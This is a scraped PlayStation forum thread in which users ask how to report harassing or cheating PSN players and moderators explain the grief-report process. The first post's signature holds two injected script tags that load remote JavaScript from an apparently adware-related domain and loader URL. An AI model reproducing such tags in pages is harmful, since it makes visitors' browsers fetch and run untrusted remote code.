Showing results for 
Search instead for 
Do you mean 
Wastelander
766 posts

Re: Reporting PSN Players

Sep 20, 2012

you know my friends have all been harrassed because they are all mexican, but i have never been treated dfferently on the network. hope the reporting system works though

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Message 11 of 33 (6,411 Views)
0 Likes
First Son
1 posts

[ Edited ]
Apr 22, 2013

ok i dont wanna be "faulse" reporting but their are a good bit of mods on GTA IV TBoGT ((grand theft auto the ballod of gay tony)) and they just harress people on the network and it agngers many people......idk if u can see if their a mods because they do a "jailbreak" on their PS3 sonsole and what not .....but theirs this one who will just NOT leave me along....if u cant find ur prove im sorry but dont say im faulse reporting please :smileysad: i love my account but i cant enjoy it because of him/her ...heres their psn :****...even his profile says hacker so :smileysad:  pleasse do something about him/her 

Edit: removed blacklisting

U--J

Message 12 of 33 (6,392 Views)
0 Likes
Splicer
49 posts

Oct 21, 2012
You learn something new everyday. It's too bad, I had a lot of users who were harrasing me a long time back. I had no idea of this feature until now. I thought the only option was putting them on the block list.
Message 13 of 33 (6,391 Views)
0 Likes
First Son
1 posts

Dec 9, 2012

HI! i'm cjrunks123, if you want to  (kick) or (ban) people from Psn for a certian tipe of days to kick or ban  them first you have to do is go on sony report a PSN player enter their psn name go down and do the rest but i forgot but however assoon as ur finished it will report them.

Hope this helped.

bye,cjrunks123 add or msg me on psn if it helped or not.

Message 14 of 33 (6,358 Views)
0 Likes
PlayStation MVP
4420 posts

[ Edited ]
Jan 3, 2014

MiniBrowney98 wrote:
*********** has been boosting offensive language

You cannot give out the PSN ID of someone you accuse of ANYTHING.  It does not matter if it is true or not.  Please review the Forum Guidelines, and you will know this.

Welcome to the Forum, BT Dubbs.

Moble

Edited quote for blacklisting

Message 15 of 33 (6,352 Views)
0 Likes
PlayStation MVP
4420 posts

Dec 10, 2012

latino4life21 wrote:

I Need Some Help On How To Report People On The PSN Network. I Have A Lot Of Issues With Harrassment Because Of My PSN Name.

Any Way I Can Report, Such As If Theres A Way Already? Or If I Can Send The Names Of The People To Someone Who Can? I Need Help! Send Me Msgs Please.

What is wrong with your PSN name?  If it is an ethnicity issue, pay those ignoramuses no attention.  It is exactly what they want.

I believe to this point you have received enough guidance to report these offenders.  It is certainly unfortunate, and completely tactless for anyone to bring ridicule of any kind to a gaming network.  Race driven ridicule, is especially despicable.

I hope you find resolution to your woes latino4life21

Welcome to the Forum, none the less.  You will not find many of those types of people hanging around in this Forum for long, if at all.

Moble

Message 16 of 33 (6,350 Views)
First Son
1 posts

[ Edited ]
Apr 22, 2013

I want to report a player who hacked my account and i did this to numerous player on PSN in my lobby on GranTurismo, his name is **** i would like him off of PSN before he hacks anymore players.

Edit: removed blacklisting

U--J

Message 17 of 33 (6,319 Views)
0 Likes
PlayStation MVP
4420 posts

Feb 25, 2013

Not the place for this.  Also, you should take down their name.  By the rules and guidelines, that is "Blacklisting".

Welcome to the PlayStation Community.

I will get you some links to lodge your complaint on.

Moble

Message 18 of 33 (6,317 Views)
0 Likes
MVP Support
7215 posts

Feb 27, 2013

If a player sends you an offending, harassing, or threatening message that bothers you then it's appropiate to report them via XMB under message by pressing triangle on it and file "Grief Report" and reason why you are reporting that person, and it gives you an option to block the offender after filing the report.

Message 19 of 33 (6,303 Views)
First Son
1 posts

Apr 21, 2013

I am posting in this thread becaue it is one of the top search results for "playstation network report player".

The old report form apparently no longer exists.  If you go to:

http://np.us.playstation.com/complaint/pc/ComplaintForm.aspx

or any "np.us.playstation.com" page you will simply redirected to this generic landing page:

http://us.playstation.com/community/?feedback=show

which has no sort of report/feedback form whatsoever.

So if you are playing an older game that isn't actively supported by the publisher, you are basically out of luck. There's essentially no repercussions for cheating on older games at all now.

Message 20 of 33 (6,267 Views)
0 Likes